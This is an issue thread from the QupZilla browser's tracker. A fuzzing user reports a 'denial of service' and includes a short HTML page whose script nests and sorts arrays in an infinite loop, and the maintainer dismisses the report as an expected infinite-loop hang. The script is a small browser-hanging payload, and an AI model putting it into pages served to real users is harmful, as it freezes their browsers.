### ISSUE TITLE
Denial of service

### ISSUE THREAD

**Issue by RootUp** [QupZilla/qupzilla#2645]
Hi Team, 

While fuzzing qupzilla, I have observed an denial of service,
This issue is triggered when the browser performs an infinite JavaScript array sort operation.

DoS11.html

```
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
```

Request you to please have a look.

**Comment by nowrep** [comment]
1. Did you read the issue template?
2. What do you expect to happen when you run infinite loop?
